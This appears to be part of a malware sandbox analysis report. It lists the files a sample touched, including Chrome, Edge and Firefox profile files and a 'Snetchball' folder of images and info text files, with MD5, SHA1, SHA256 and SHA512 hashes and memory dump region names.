| MD5 | 33292c7c04ba45e9630bb3d6c5cabf74 |
| SHA1 | 3482eb8038f429ad76340d3b0d6eea6db74e31bd |
| SHA256 | 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249 |
| SHA512 | 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json
| MD5 | 5c5a1426ff0c1128c1c6b8bc20ca29ac |
| SHA1 | 0e3540b647b488225c9967ff97afc66319102ccd |
| SHA256 | 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839 |
| SHA512 | 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json
| MD5 | a14d4b287e82b0c724252d7060b6d9e9 |
| SHA1 | da9d3da2df385d48f607445803f5817f635cc52d |
| SHA256 | 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152 |
| SHA512 | 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb |
memory/3592-1512-0x0000000000930000-0x00000000009D2000-memory.dmp
memory/3420-1517-0x0000000000400000-0x00000000004BA000-memory.dmp
memory/3592-1518-0x0000000000400000-0x00000000006DC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 813a8918ddb568eafeb954f91697b5f0 |
| SHA1 | fe7451adb62d806df7f42a33069026d3438311f4 |
| SHA256 | 850a9e0a93531f8ec7d342b33f6897fabaa68ef9825ab87d8383fd1a7c976778 |
| SHA512 | 776f50a2bfdd6876c800769ec79b5c5d250a615a39bde5af618ef4623beb0a7f985471b833a5fdf04df9bfbc23d36fb1c987e9427ca84d239cf55ab6e85dbfb4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qzr7kws6.default-release\prefs.js
| MD5 | 2b9b4dce1e600d2d6f8afcfb826401a2 |
| SHA1 | 835cb5e8d32f1948ed362c551ecd4b21a5eb09fd |
| SHA256 | 7e8c6c170f7cea04489587307e3836ffced249bed1c790105f3e2ddd743edfc0 |
| SHA512 | f57ed61c2feda037b1787d8e70495a49badcf5c88a4914bc1a2cdae4960bf3f1801d9effb09b08d2c37bfd7f59a670290c1aa34a6173743536afb3e806edb423 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2674ee63a0334b9a1f0b65f056691aa2 |
| SHA1 | 713966381fc19322ee23208e5943270c56db31c9 |
| SHA256 | 581359afa0dd27f2997daf08931ef0d99f4d8d203ee403e4caea0a9b5a887455 |
| SHA512 | 09e8e2b803b26d191af761b90a19e552dd0e2f6b6f93af85923e8dbf0c407689698c00e0e05d281b822f234c8cab8b11c90d72e690cd68fb46417123ee867fc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 90b8e3c077c7289cf4b7078243e26f76 |
| SHA1 | c8e3387c59c20fcff770b846e972a52f7f93591c |
| SHA256 | 001c51870a28710313d50d9037f261881517a384d3e502d9112b04ea2e8538a1 |
| SHA512 | 4461003ce00d03608509d7ab645b933ec95c398623a1d8c6440c8a5b069d32e73aff391a1d3954511dfca7da698c0820970017b66629e3647800e5cc3920f1cf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\77431409-2c92-4239-921a-d843290a8378.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6feeb0fef26e15da1445dcac241876ef |
| SHA1 | d21e32d3296cc693692f51b64bf686dee358a403 |
| SHA256 | 5b82617932e4629bb3391b1516328fe5d052b8d6de9ee8aef934939754a7c3c5 |
| SHA512 | e04c85acff76b8d9f10128e97787ed95917ab0c829ecc68071ef0c77db11827073b9073e4398ba0fe9f5c3f3d69a3d533cd19009014727ac816f4a6ca315fd89 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1119747c353a8756854ee93ac43061da |
| SHA1 | 41d0b808eedb39c4aa65d8cbefa6d2be35bac28e |
| SHA256 | 18b0be4f1c08e9a5ce73d42111648de9fc566e8a29815fbb3553380af0f1b030 |
| SHA512 | 67d0b77c6e50c936eb4090d71f199e32c253e4f1277c71f6e044ac549625b549f6bc5a664fbf424dbc27e3e817f945870bc7dab77d73da201316772d43f7c410 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 45becad4b69a13a1a1625c608c3db02d |
| SHA1 | 2c0b69f532423e398943ee6a458b51778ff5ece2 |
| SHA256 | 0bbf92a25b3647c8f424a6d9b26e05fc8d48c1d9855f23159d6098e72409aa33 |
| SHA512 | fc65a06ae790b2c24ee22eb4b82b86651f3bf3537f0857bef15b7d3c0893773d0005790253415cfffd9d2e65353f93aa65bcfbe8c9ac54bd4d8d4b384ebba78e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4869a1ac033361ddebec94c14cc72527 |
| SHA1 | 9167798ca80aa10799617839eac7671d7a80ee50 |
| SHA256 | 74905ae1d2e38473f8a09cbbc736ebb6d12c18c47f420a2a5fc8d7d907d6d2aa |
| SHA512 | 1fe0f0cd7188027f8dd8c82fe9cfe758d0b93f81a5e60818bac7417a5db4cfb30bb373164ab2173567cd76e6674fa588e5f6aaa2e21fc4af34b8d09ba7c09314 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 52b286ef2ef4aff41d54397b3d47a348 |
| SHA1 | 11f78664850c5310e9d8c79f8ea1ee60ca0fcfe7 |
| SHA256 | e94d4776e667b025cd6ce3a9cb7b3b05d196b989bbabc46fb6a122ca1afa8752 |
| SHA512 | 923a1642626d9a83c07900d94c01c21add1e7b26a06afce7275abe20ad164b6c9758b3c7e7f9f8b0abc0787671883d636979413530b1b8e64d9c5a6537b88e7e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 56b509e7087dcbbf500a750f0fe02b57 |
| SHA1 | c00fca769303e2b241a42e0651431a54ca9634f2 |
| SHA256 | 630ec67fbba43e87ecb04520756ee6610d4aa51a6e920b853f3360b926fca1e9 |
| SHA512 | 673e579d29b28cf434d56da31e8b42512d61d431dd76a48dfca14b9aa40e2447351b1cc45ba82a3f829a0bd0a64372ce2ae8192c8688d0088e17ea9f574bfb72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4e5ad7fc-5858-424b-86e2-20eceac2331b.tmp
| MD5 | a34359d4f20d2b2bd34dd9871ea649ea |
| SHA1 | 99bc8b2109c6743c5fe42cdc56f4ce93c8086823 |
| SHA256 | 0e60810dcee95f89bdef9372df9b0db2b7a6e5014a84c5fe671d00ada3352c67 |
| SHA512 | e4d7a14104c28085bc066b339c0441caf14f9a58fdc9b33cc136eb69f5f6a5604d4e8f83095dcdc77cf7e2468d7dcc21e5181f182e2dc065c9b7e002fd2238b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ab00991f1d3e502bb481718aa917597e |
| SHA1 | e919fe245b2e646a844ea2b56689be222440fb03 |
| SHA256 | 1ad7787e889c4a459e0e6135600b9d2e67b258ba3d97c078fcd43df3dbdbe62f |
| SHA512 | 8d5e369da36c3f98a42172bcd504d06eaabf4322809612c6d06c4779ab3dd82cbea147f78fb3fbde6c19212a6708c0d7a8aaa5a1a8b51ec1452cadaeadd2fa01 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 81cb6465f791be20ab699f63ff212518 |
| SHA1 | c3aaf7c0031fb3d208494ad5cd54c72430a44534 |
| SHA256 | 065295e10b7b1e5ed605ce5cf6b108c62dc1b8278914ccd40425e756693637e7 |
| SHA512 | 305c36a11c3fcb6b864eb822fe5118494086a8a8b7a9296b3121fab794b2294995e9fbfe2da7a2be8912b77c72cd687458251061b18113b04f85c7d53a2a7bd4 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\3.jpg
| MD5 | 302bbda00dab1d0b6190cd57df10f212 |
| SHA1 | 275d439d526303f98afc82cc2180d37a05ec206b |
| SHA256 | 2c6465595a1e2db398f88e60305ee29b122e3abfab639cb4151c7e0a6ade9eb0 |
| SHA512 | a4976e71ef6606187c7b21c0c3950e3bbac6e1e7778024efb9bcb5ba42bba8cedd8a316df67a1cd85db85b4dd80675d1d04a1c003e2dc96818b4e42fdc58c0a5 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\4.jpg
| MD5 | 4c46007ccdebf76df44df26f52d15288 |
| SHA1 | 7adccf75d8e85b7ecd77d79bb6a6604acf9d7683 |
| SHA256 | 9c5db65872f3694cba46a23c92a1dfa725c8de7ac01a4370248d7a4833d61eff |
| SHA512 | 1b48efe49f660acc8f181942d09ff1f1218a962c843cfbf7687c92d889567730d29e88ab644458d836269eefae94f05f4b3cf08e820dc1a42dfe759a12c6aaf8 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg
| MD5 | d1c40ef3dc48934cf2245d31d9f32552 |
| SHA1 | f6ba50aca34c6c077e2c5a2feabe07c7a07525b2 |
| SHA256 | dfd59dd38c33229566d3971e72f8e46a3f90157d295e1e0af8a583a1168ebd58 |
| SHA512 | 04175f3989d1ed92a615ff410d8ed92ddce7e63132313e7e3519eec61d614d090884b47e06e53a50234b486131da77890765c4a9ed00052b463da21af153801a |
C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg
| MD5 | 1589ad0a375378f5c0817c6594246568 |
| SHA1 | 4d09fc9e2213798f17d7095963d12838111d8659 |
| SHA256 | d90da60c4e43678306610d356d36097502be87d949229eb65e270c6f9a0d9750 |
| SHA512 | bc808eb23187d036a268a17e9fd6fc549f44e8ea4b447953e7924c0d40cb47284e48c2fb1da20c9638e96806eb40d1e54cb200d082607896f4d320b074c63c65 |
memory/6396-1789-0x0000000008BF0000-0x0000000008C68000-memory.dmp
memory/6396-1790-0x00000000091A0000-0x00000000096CC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Snetchball\results\1_info_0.txt
| MD5 | c9a715b558c4abdc09d1011774247791 |
| SHA1 | d4f3fd0b34db43a52c6440aef4fcf23d660bfbe3 |
| SHA256 | e80d3e9567cb42fc58bf5a49629e3e6b665c63aac1c618def520e7ee3ddd7afb |
| SHA512 | a398f8afa2f28bfb861d7914a7a7ee2ca25b16c97201fa7938d323de932a5ddbb0f3415e88dd8db2209339e08ee415185b5a575851b9162e4bc23d94877a0c49 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 0c20f4dee910b07457317f672f36da00 |
| SHA1 | 31d21f0f80db60187adc016e994b97cadb563e2b |
| SHA256 | 9c734db3f1fc7c7cba0c550683160d2a372447e550fbc1881c5ff46761c826c5 |
| SHA512 | 7309a5b35f670b1bbebf39d7bcd1ed7582165ab3a9ff51b4c6f3d2418f586226804dd271209375a1435c072572589441907fccc86bebe9522cabbf977b2bafb3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 30a6b3bdd82ec5c73f455264b8f338d7 |
| SHA1 | 0983f8c372b2c5edaf8c892b728f8dc91ea861e5 |
| SHA256 | 5ebad85744d65ff774bda86b97700c1835fafd785129a6307438514afeb7c175 |
| SHA512 | a5b714eb5b774d4bf6c55137f268e4e123497cdd838a62ab0320f19db3428d62359583a7a09e94102fd564f2675e647cac44fa50e391e35c4b04213f83e8242f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 97fcf6d18c445ed28a19e9b17ec73a3b |
| SHA1 | 83d4f9590398872a36b9632ba2349a98e11015d1 |
| SHA256 | 7a74852d6ef6038ac1b3bcdae1a3196b230c9534f0268439533579f2c4ab3c89 |
| SHA512 | 86a0ae5992d5f8b6976abad451ce10715678b2b11beba1c318c6001453bc7af46e360abac37b9ceaf58bff9cb7ef5bf4e938cff51da8132d463222bd747e9c84 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 12e14924845d5c9651c7692d3fcc2fc3 |
| SHA1 | 83b22d9459a5f4d15d02ae2d6b18e207a387b15a |
| SHA256 | 74a35b394b000bcac079e7c191a89cddb65d9570120d06e8c39090b246eb6a20 |
| SHA512 | 5824b8159d4ab4d888231965cb31bf9c5b954169809affc9bf5489e61c66d5c9ac4f0336a6d9f64074a390cfe8bd6443b282a3836c18b57186c4985c14ed9b88 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3544b6a0cc52b84669e8a1fb952ba341 |
| SHA1 | 54d943058230cb7adacf623f474e966477d08ea5 |
| SHA256 | 93ed61270ae46885da9a42dbcaafd4e658c8d23ac57d489c3a804b78d267f7e6 |
| SHA512 | cca7bbdda82ebd28d188ea18a54bc5b1a660ca9da84dcc1da2dbb8b0e49bc411630fb101f490db282889a1b0f67b99e728f4d5a68b7dc5de535a4b51dcc6739d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d76bd3dde91920e33230e3f4cde79c0b |
| SHA1 | 1c40ec36de51a07189d58dfb23b5a589a05e2391 |
| SHA256 | 19daa3484b3e1e25a677d9c2f02b9b102e7a0932f9b16972531355a2bc31b5bf |
| SHA512 | 8562b1b4984244130f5b98550ff3935ebd9b51e357a99aed7c2fc9e2a12b179dece7bdaa6e56f8e71c23c6168f33c9f925e0ca07f2e6d7670ffa1f2a865ec72f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b072b5f03fb55c3f929e909ebbcf4a38 |
| SHA1 | cc0439c4905bf6e1edc313d952b07df8d0534a9b |
| SHA256 | 25c9b4a8cd53847ce3f7c4cf2627edb284ec571f944cd5472c1950215bb3797d |
| SHA512 | 1a399916ef8604194bbe84e041ad85338cc125bec91452bf3abb4f037e022232af6332ef185dcbd6318358d5cdb18d4e324edd57b2bdcc71958a9cb2587ef744 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5cfb3acbdc7172670af56344a53d4d02 |
| SHA1 | e900a9dd5b57c058dcec8efd4667b797c6dc16cb |
| SHA256 | 5530b77e8d30803ea38cefff057fdc1e93f1ff4643ae1084a2d392a93ad8c1df |
| SHA512 | dfe92a2bb404891204fd29ca97a43bda1675d66d117088e3e59d01560af69816761b87fde926be65a6eed2ca85bd69c9c98d606bd6eacc007df3dec041070526 |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | f99dbdef252d50670760643c21d3ccb4 |
| SHA1 | 4a48614ca4cc207f5d82ae7efc4c49d8e9a5578d |
| SHA256 | 26aa91145d7e91272f10c8883d8116b2b84821e1ba199421a879418a8f53dab8 |
| SHA512 | 80ff73792012b8b8a21959b50e8cfb245c99f24054038b6883ef503527061760ea1b0bddca077d14270bf2084d332d8c5c1e6ee4f88acc63986842741079b73a |